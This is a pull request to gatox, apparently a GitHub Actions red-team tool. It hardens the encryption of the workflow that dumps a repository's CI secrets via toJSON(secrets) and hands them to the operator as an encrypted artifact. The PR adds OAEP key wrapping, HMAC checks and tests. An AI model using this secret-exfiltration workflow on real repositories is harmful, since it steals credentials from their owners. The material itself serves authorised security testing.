### PR TITLE
Harden secrets artifact encryption

### DIFF
--- a/gatox/attack/secrets/secrets_attack.py
+++ b/gatox/attack/secrets/secrets_attack.py
@@ -16,13 +16,14 @@ limitations under the License.
 
 import asyncio
 import hashlib
+import hmac
 import json
 import random
 import string
 
 import yaml
 from cryptography.hazmat.backends import default_backend
-from cryptography.hazmat.primitives import serialization
+from cryptography.hazmat.primitives import hashes, serialization
 from cryptography.hazmat.primitives.asymmetric import padding, rsa
 from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
 
@@ -107,9 +108,16 @@ EOF
                 {
                     "name": "Run Tests",
                     "env": {"PUBKEY": pubkey},
-                    "run": "aes_key=$(openssl rand -hex 12 | tr -d '\\n');"
-                    "openssl enc -aes-256-cbc -pbkdf2 -in output.json -out output_updated.json -pass pass:$aes_key;"
-                    'echo $aes_key | openssl rsautl -encrypt -pkcs -pubin -inkey <(echo "$PUBKEY") -out lookup.txt 2> /dev/null;',
+                    "run": """
+aes_key=$(openssl rand -hex 32 | tr -d '\\n')
+iv=$(openssl rand -hex 16 | tr -d '\\n')
+hmac_key=$(openssl rand -hex 32 | tr -d '\\n')
+openssl enc -aes-256-cbc -K "$aes_key" -iv "$iv" -in output.json -out output_updated.json
+openssl dgst -sha256 -mac HMAC -macopt "hexkey:$hmac_key" -binary output_updated.json > output_updated.hmac
+printf '{"v":1,"alg":"AES-256-CBC-HMAC-SHA256","aes_key":"%s","iv":"%s","hmac_key":"%s"}' "$aes_key" "$iv" "$hmac_key" > key_bundle.json
+openssl pkeyutl -encrypt -pubin -inkey <(printf '%s\\n' "$PUBKEY") -in key_bundle.json -out lookup.txt -pkeyopt rsa_padding_mode:oaep -pkeyopt rsa_oaep_md:sha256 -pkeyopt rsa_mgf1_md:sha256
+shred -u key_bundle.json 2> /dev/null || rm -f key_bundle.json
+                    """,
                 },
                 # Upload the encrypted files as workflow run artifacts.
                 # This avoids the edge case where there is a secret set to a value that is in the Base64 (which breaks everything).
@@ -118,7 +126,9 @@ EOF
                     "uses": "actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a",
                     "with": {
                         "name": artifact_name,
-                        "path": " |\noutput_updated.json\nlookup.txt",
+                        "path": (
+                            "output_updated.json\nlookup.txt\noutput_updated.hmac"
+                        ),
                     },
                 },
             ],
@@ -153,8 +163,97 @@ EOF
         return (private_key, pem.decode())
 
     @staticmethod
-    def __decrypt_secrets(priv_key, encrypted_key, encrypted_secrets):
+    def __decrypt_secrets(
+        priv_key,
+        encrypted_key,
+        encrypted_secrets,
+        encrypted_secrets_hmac=None,
+    ):
         """Utility method to decrypt secrets given ciphertext blob and a private key."""
+        encrypted_key = SecretsAttack.__ensure_bytes(encrypted_key)
+        encrypted_secrets = SecretsAttack.__ensure_bytes(encrypted_secrets)
+
+        if encrypted_secrets_hmac is not None:
+            return SecretsAttack.__decrypt_authenticated_secrets(
+                priv_key,
+                encrypted_key,
+                encrypted_secrets,
+                SecretsAttack.__ensure_bytes(encrypted_secrets_hmac),
+            )
+
+        return SecretsAttack.__decrypt_legacy_secrets(
+            priv_key,
+            encrypted_key,
+            encrypted_secrets,
+        )
+
+    @staticmethod
+    def __ensure_bytes(value):
+        """Normalize artifact content to bytes."""
+        if isinstance(value, str):
+            return value.encode()
+        return value
+
+    @staticmethod
+    def __has_current_artifact_files(files):
+        """Return whether an artifact has all current encrypted dump files."""
+        return bool(files) and all(
+            name in files
+            for name in ("output_updated.json", "lookup.txt", "output_updated.hmac")
+        )
+
+    @staticmethod
+    def __decrypt_authenticated_secrets(
+        priv_key,
+        encrypted_key,
+        encrypted_secrets,
+        encrypted_secrets_hmac,
+    ):
+        """Decrypt authenticated OAEP-wrapped secrets artifacts."""
+        key_bundle = priv_key.decrypt(
+            encrypted_key,
+            padding.OAEP(
+                mgf=padding.MGF1(algorithm=hashes.SHA256()),
+                algorithm=hashes.SHA256(),
+                label=None,
+            ),
+        )
+        key_data = json.loads(key_bundle.decode())
+        if key_data.get("v") != 1 or key_data.get("alg") != "AES-256-CBC-HMAC-SHA256":
+            raise ValueError("Unsupported secrets artifact encryption metadata.")
+
+        key = SecretsAttack.__decode_hex_key(key_data, "aes_key", 32)
+        iv = SecretsAttack.__decode_hex_key(key_data, "iv", 16)
+        hmac_key = SecretsAttack.__decode_hex_key(key_data, "hmac_key", 32)
+
+        expected_hmac = hmac.new(
+            hmac_key,
+            encrypted_secrets,
+            hashlib.sha256,
+        ).digest()
+        if not hmac.compare_digest(expected_hmac, encrypted_secrets_hmac):
+            raise ValueError("Encrypted secrets artifact failed HMAC verification.")
+
+        cipher = Cipher(algorithms.AES256(key), modes.CBC(iv))
+        decryptor = cipher.decryptor()
+        cleartext = decryptor.update(encrypted_secrets) + decryptor.finalize()
+
+        return SecretsAttack.__remove_pkcs7_padding(cleartext)
+
+    @staticmethod
+    def __decode_hex_key(key_data, field, expected_length):
+        """Decode a fixed-size hex key from a wrapped key bundle."""
+        value = bytes.fromhex(key_data[field])
+        if len(value) != expected_length:
+            raise ValueError(f"Invalid {field} length in secrets artifact metadata.")
+        return value
+
+    @staticmethod
+    def __decrypt_legacy_secrets(priv_key, encrypted_key, encrypted_secrets):
+        """Decrypt pre-authentication OpenSSL enc artifacts."""
+        if encrypted_secrets[:8] != b"Salted__":
+            raise ValueError("Unsupported legacy secrets artifact format.")
+
         salt = encrypted_secrets[8:16]
         ciphertext = encrypted_secrets[16:]
 
@@ -168,9 +267,22 @@ EOF
         decryptor = cipher.decryptor()
 
         cleartext = decryptor.update(ciphertext) + decryptor.finalize()
-        cleartext = cleartext[: -cleartext[-1]]
 
-        return cleartext
+        return SecretsAttack.__remove_pkcs7_padding(cleartext)
+
+    @staticmethod
+    def __remove_pkcs7_padding(cleartext):
+        """Remove and validate OpenSSL AES-CBC PKCS#7 padding."""
+        if not cleartext:
+            raise ValueError("Empty secrets artifact plaintext.")
+
+        padding_length = cleartext[-1]
+        if padding_length < 1 or padding_length > 16:
+            raise ValueError("Invalid secrets artifact padding.")
+        if cleartext[-padding_length:] != bytes([padding_length]) * padding_length:
+            raise ValueError("Invalid secrets artifact padding.")
+
+        return cleartext[:-padding_length]
 
     async def secrets_dump(
         self,
@@ -256,14 +368,21 @@ EOF
                     all_artifacts = await self.api.retrieve_all_workflow_artifacts(
                         target_repo, workflow_id
                     )
-                    if expected.issubset(all_artifacts.keys()):
+                    if expected.issubset(all_artifacts.keys()) and all(
+                        self.__has_current_artifact_files(all_artifacts.get(name))
+                        for name in expected
+                    ):
                         break
                     await asyncio.sleep(1)
 
-                missing = expected - all_artifacts.keys()
+                missing = {
+                    name
+                    for name in expected
+                    if not self.__has_current_artifact_files(all_artifacts.get(name))
+                }
                 if missing:
                     Output.error(
-                        "Artifacts missing for environment(s): "
+                        "Artifacts missing or incomplete for environment(s): "
                         f"{', '.join(artifact_to_env[m] for m in missing)}"
                     )
 
@@ -276,17 +395,11 @@ EOF
                     artifact = await self.api.retrieve_workflow_artifact(
                         target_repo, workflow_id
                     )
-                    if (
-                        artifact
-                        and "output_updated.json" in artifact
-                        and "lookup.txt" in artifact
-                    ):
+                    if self.__has_current_artifact_files(artifact):
                         break
                     await asyncio.sleep(1)
 
-                if not artifact or not (
-                    "output_updated.json" in artifact and "lookup.txt" in artifact
-                ):
+                if not self.__has_current_artifact_files(artifact):
                     Output.error(
                         "Failed to retrieve workflow artifact! "
                         "Artifacts may not have been uploaded."
@@ -332,7 +445,10 @@ EOF
             if "output_updated.json" not in files or "lookup.txt" not in files:
                 continue
             cleartext = self.__decrypt_secrets(
-                priv_key, files["lookup.txt"], files["output_updated.json"]
+                priv_key,
+                files["lookup.txt"],
+                files["output_updated.json"],
+                files.get("output_updated.hmac"),
             )
             secrets = json.loads(cleartext)
             for k, v in secrets.items():

--- a/unit_test/test_secrets_attack.py
+++ b/unit_test/test_secrets_attack.py
@@ -1,5 +1,14 @@
+import hashlib
+import os
 import re
+import shutil
+import subprocess
 from unittest.mock import AsyncMock, MagicMock, patch
+
+import pytest
+import yaml as yaml_parser
+from cryptography.hazmat.primitives.asymmetric import padding
+from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
 
 from gatox.attack.secrets.secrets_attack import SecretsAttack
 from gatox.github.api import Api
@@ -28,7 +37,23 @@ def test_create_secret_exil_yaml():
     assert "${{ toJSON(secrets)}}" in yaml
     assert "actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a" in yaml
     assert "name: files\n" in yaml
+    assert "output_updated.hmac" in yaml
     assert "matrix" not in yaml
+
+
+def test_create_secret_exfil_yaml_uses_authenticated_encryption():
+    """Test generated workflow authenticates artifacts before exfil."""
+    _, pub = SecretsAttack._SecretsAttack__create_private_key()
+
+    yaml_str = SecretsAttack.create_exfil_yaml(pub, "evilBranch")
+
+    assert "openssl pkeyutl -encrypt" in yaml_str
+    assert "rsa_padding_mode:oaep" in yaml_str
+    assert "rsa_oaep_md:sha256" in yaml_str
+    assert "rsa_mgf1_md:sha256" in yaml_str
+    assert "openssl dgst -sha256 -mac HMAC" in yaml_str
+    assert "output_updated.hmac" in yaml_str
+    assert "rsautl" not in yaml_str
 
 
 def test_create_secret_exfil_yaml_environments():
@@ -44,6 +69,104 @@ def test_create_secret_exfil_yaml_environments():
     assert "staging" in yaml_str
     assert "files-${{ matrix.safe_name }}" in yaml_str
     assert "environment: ${{ matrix.environment }}" in yaml_str
+
+
+def _build_legacy_secrets_artifact(priv_key, payload):
+    """Build a legacy OpenSSL enc-compatible secrets artifact."""
+    salt = b"12345678"
+    sym_key = b"legacy-test-key"
+    derived_key = hashlib.pbkdf2_hmac("sha256", sym_key, salt, 10000, 48)
+    key = derived_key[0:32]
+    iv = derived_key[32:48]
+    padding_length = 16 - (len(payload) % 16)
+    padded_payload = payload + bytes([padding_length]) * padding_length
+
+    cipher = Cipher(algorithms.AES256(key), modes.CBC(iv))
+    encryptor = cipher.encryptor()
+    encrypted_payload = encryptor.update(padded_payload) + encryptor.finalize()
+
+    encrypted_key = priv_key.public_key().encrypt(sym_key, padding.PKCS1v15())
+    encrypted_secrets = b"Salted__" + salt + encrypted_payload
+
+    return encrypted_key, encrypted_secrets
+
+
+def test_decrypt_secrets_supports_legacy_artifact():
+    """Test existing legacy artifacts can still be decrypted."""
+    priv, _ = SecretsAttack._SecretsAttack__create_private_key()
+    payload = b'{"TEST_SECRET":"TEST_VALUE"}'
+    encrypted_key, encrypted_secrets = _build_legacy_secrets_artifact(priv, payload)
+
+    cleartext = SecretsAttack._SecretsAttack__decrypt_secrets(
+        priv,
+        encrypted_key,
+        encrypted_secrets,
+    )
+
+    assert cleartext == payload
+
+
+@pytest.mark.skipif(
+    shutil.which("bash") is None or shutil.which("openssl") is None,
+    reason="bash and openssl are required to exercise the generated workflow step",
+)
+def test_decrypt_secrets_round_trips_authenticated_openssl_artifact(tmp_path):
+    """Test generated OpenSSL commands produce decryptable authenticated artifacts."""
+    priv, pub = SecretsAttack._SecretsAttack__create_private_key()
+    payload = b'{"TEST_SECRET":"TEST_VALUE"}'
+    workflow = yaml_parser.safe_load(SecretsAttack.create_exfil_yaml(pub, "evilBranch"))
+    run_script = workflow["jobs"]["testing"]["steps"][1]["run"]
+
+    (tmp_path / "output.json").write_bytes(payload)
+    subprocess.run(
+        [shutil.which("bash"), "-c", f"set -euo pipefail\n{run_script}"],
+        cwd=tmp_path,
+        env={**os.environ, "PUBKEY": pub},
+        check=True,
+        capture_output=True,
+        text=True,
+    )
+
+    cleartext = SecretsAttack._SecretsAttack__decrypt_secrets(
+        priv,
+        (tmp_path / "lookup.txt").read_bytes(),
+        (tmp_path / "output_updated.json").read_bytes(),
+        (tmp_path / "output_updated.hmac").read_bytes(),
+    )
+
+    assert cleartext == payload
+
+
+@pytest.mark.skipif(
+    shutil.which("bash") is None or shutil.which("openssl") is None,
+    reason="bash and openssl are required to exercise the generated workflow step",
+)
+def test_decrypt_secrets_rejects_tampered_authenticated_artifact(tmp_path):
+    """Test authenticated artifacts fail closed when ciphertext changes."""
+    priv, pub = SecretsAttack._SecretsAttack__create_private_key()
+    workflow = yaml_parser.safe_load(SecretsAttack.create_exfil_yaml(pub, "evilBranch"))
+    run_script = workflow["jobs"]["testing"]["steps"][1]["run"]
+
+    (tmp_path / "output.json").write_bytes(b'{"TEST_SECRET":"TEST_VALUE"}')
+    subprocess.run(
+        [shutil.which("bash"), "-c", f"set -euo pipefail\n{run_script}"],
+        cwd=tmp_path,
+        env={**os.environ, "PUBKEY": pub},
+        check=True,
+        capture_output=True,
+        text=True,
+    )
+
+    encrypted_secrets = bytearray((tmp_path / "output_updated.json").read_bytes())
+    encrypted_secrets[-1] ^= 1
+
+    with pytest.raises(ValueError, match="HMAC"):
+        SecretsAttack._SecretsAttack__decrypt_secrets(
+            priv,
+            (tmp_path / "lookup.txt").read_bytes(),
+            bytes(encrypted_secrets),
+            (tmp_path / "output_updated.hmac").read_bytes(),
+        )
 
 
 @patch(
@@ -83,6 +206,7 @@ w1M8xrm+PUM5qaWCANScuX8CAwEAAQ==
     mock_api.return_value.retrieve_workflow_artifact.return_value = {
         "lookup.txt": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
         "output_updated.json": "A" * 100,
+        "output_updated.hmac": "B" * 32,
     }
     mock_api.return_value.get_recent_workflow.return_value = 11111111
     mock_api.return_value.get_workflow_status.return_value = 1
@@ -250,10 +374,12 @@ async def test_secrets_dump_environments(mock_api, mock_privkey, mock_dec, capsy
         "files-staging": {
             "lookup.txt": b"key",
             "output_updated.json": b"enc",
+            "output_updated.hmac": b"hmac",
         },
         "files-production": {
             "lookup.txt": b"key",
             "output_updated.json": b"enc",
+            "output_updated.hmac": b"hmac",
         },
     }
 


### PR DESCRIPTION
## Summary

Fixes the secrets-dump artifact format so retained workflow artifacts are encrypted and authenticated.

Bug being fixed:
- The secrets-dump workflow encrypted the retained artifact, but the payload used AES-CBC without an authentication check.
- If `--delete-run` was not used, the completed Actions run and artifact remained available. The old artifact format could not detect ciphertext tampering before decrypt.
- The symmetric key was also wrapped with legacy RSA PKCS#1 v1.5 via `rsautl`, which is deprecated and weaker than OAEP for this use case.

How this branch fixes it:
- Generates separate random AES, IV, and HMAC keys for each dump.
- Encrypts the secret payload with AES-256-CBC and writes a separate HMAC-SHA256 over the encrypted payload.
- Wraps the key metadata with RSA-OAEP using SHA-256 instead of RSA PKCS#1 v1.5.
- Verifies the HMAC before decrypting, so modified retained artifacts fail closed.
- Keeps legacy artifact decryption support for compatibility with older artifacts.

## Type of change

- [x] Bug fix
- [ ] New feature
- [ ] Breaking change
- [ ] Other

## Testing

Validated this branch against a controlled private test repository with a dummy Actions secret.

Results:
- Local tests pass, including a generated OpenSSL workflow-step round trip.
- Tampering with `output_updated.json` is rejected before decrypt via HMAC verification.
- Legacy artifact decryption remains supported.
- Live GitHub Actions smoke test with `--delete-run` successfully queued, executed, retrieved/decrypted the dummy secret, and deleted the workflow run.
- Live GitHub Actions smoke test without `--delete-run` also decrypted successfully; as expected, the completed run and artifact remained available until cleanup.
- Downloaded the retained no-delete artifact and confirmed it contains the encrypted payload, wrapped key bundle, and HMAC file, with no dummy secret marker present as plaintext.

Validation commands:
- `.venv/bin/python -m black --check gatox/attack/secrets/secrets_attack.py unit_test/test_secrets_attack.py`
- `.venv/bin/python -m isort --profile black --check-only gatox/attack/secrets/secrets_attack.py unit_test/test_secrets_attack.py`
- `.venv/bin/python -m ruff check gatox/attack/secrets/secrets_attack.py unit_test/test_secrets_attack.py`
- `.venv/bin/python -m pytest unit_test/test_secrets_attack.py -q`
- `.venv/bin/python -m pytest -q`

Full suite result: `560 passed`. The full suite still emits two existing AsyncMock RuntimeWarnings in app enumeration tests.

## Notes

This does not retroactively protect artifacts created by older versions. If `--delete-run` is not used, the completed Actions run and encrypted artifact still remain available according to repository access and artifact retention settings.

Closes #